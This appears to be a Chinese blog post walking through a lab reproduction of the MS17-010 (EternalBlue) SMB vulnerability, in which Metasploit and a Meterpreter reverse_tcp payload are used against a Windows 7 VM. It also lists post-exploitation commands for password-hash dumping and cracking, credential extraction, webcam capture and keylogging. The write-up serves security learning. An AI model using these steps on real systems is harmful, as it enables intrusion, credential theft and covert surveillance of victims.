MS17-010漏洞复现

  • 官方描述:Microsoft Security Bulletin MS17-010 - Critical | Microsoft Learn
  • 漏洞描述:
    • Microsoft Windows SMB Server远程代码执行漏洞,Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。
  • 涉及系统版本
    • Microsoft Windows Server 2016、Microsoft WindowsServer 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft WindowsServer 2008、Microsoft Windows RT 8.1等等
  • 漏洞复现:
    • 工具资料准备
      • kali系统
      • nmap、msf
      • vmware 
      • win7 靶机
    • 复现过程
      • 1.登录kali,切换root
        • MS17-010漏洞复现_第1张图片

      • 查看当前所处网段
        • MS17-010漏洞复现_第2张图片

      • 查看win7的IP以及kali和win7的联通情况
        • ipconfig

        • ping 192.168.24.129

          MS17-010漏洞复现_第3张图片

      • 使用nmap扫描win7:
        • nmap -T4 -A -v -Pn 192.168.24.129
        • 发现445端口开启状态

          MS17-010漏洞复现_第4张图片

      • 启用msf:
        • msfconsole
        • MS17-010漏洞复现_第5张图片

      • 搜索漏洞:
        • search ms17-010
        • 显示如下模块:

          MS17-010漏洞复现_第6张图片

        • 字段说明
          • name:模块名
            • exploit攻击模块
            • auxiliary辅助扫描模块
          • disclosure Date:漏洞纰漏时间
          • Rank:可靠性等级
            • MS17-010漏洞复现_第7张图片

          • check:该模块是否支持漏洞检测
          • description:漏洞或模块的详细介绍
      • 使用永恒之蓝模块并配置参数
        • use 0
        • 会出现如下图提示,没有荷载,默认使用window/x64/meterpreter/reverse_tcp荷载,设置荷载,设置受害者主机以及服务主机如下图:

          MS17-010漏洞复现_第8张图片

        • 也可以通过show playloads 命令查看当前模块所有的攻击载荷

          MS17-010漏洞复现_第9张图片

      • 配置完使用show options 查看配置参数
        • MS17-010漏洞复现_第10张图片

        • 可以看到受害主机192.168.24.129,端口445
        • 以及服务主机信息
        • MS17-010漏洞复现_第11张图片

      • 渗透
        • 渗透成功,提示 目标主机 Meterpreter session 1 opened

          MS17-010漏洞复现_第12张图片

        • 获取受害者系统桌面快照 使用screenshot

        • 打开图片

          MS17-010漏洞复现_第13张图片

        • 将图片上传到C盘目录下 使用 upload /home/kali/AKEZNoiU.jpeg C:\\heihei.jpeg
        • 切换到win7,查看对应目录

          MS17-010漏洞复现_第14张图片

        • 下载图片到kali桌面

        • 如图

        • 查看win7用户权限 getuid
          • Windows命令为:getuid
          • Linux命令为:whoami
          • 发现当前为管理员权限

        • 进入shell

          MS17-010漏洞复现_第15张图片

        • 可以利用shell对账号进行提权
        • 获取账号密码 hashdump

        • 通过md5解析网站获取密码明文
        • md5在线解密破解,md5解密加密 (cmd5.com)

          MS17-010漏洞复现_第16张图片

      • 后渗透命令收集:
        • screenshot //桌面截图
        • shell //进入的就是DOS系统 受害者win7的cmd命令行
        • chcp 65001 //改变编码方式,改乱码
        • whoami //查看受害者当前用户及权限
        • windows系统最高权限:system(系统权限)
        • 从命令行退回
          • meterpreter:exit
          • ctrl+c
        • 拍照:
          • webcam_list //检测摄像头设备
          • webcam_snap //拍照
          • webcam_stream //摄影,视频
        • 键盘监听:
          • ps //查看windows系统运行进程
          • migrate -P 进程的PID
          • keyscan_start //开始监听
          • keyscan_dump //获取监听
          • keyscan_stop //停止监听
        • 抓取密码:
          • hashdump //抓取加密之后的密码
          • 加密方式:MD5 在线解密网站:https://www.cmd5.com/
          • creds_wdigest //工具kiwi抓取密码的命令
            • 如图

              MS17-010漏洞复现_第17张图片

你可能感兴趣的:(网络安全,我的网安学习之路,漏洞复现)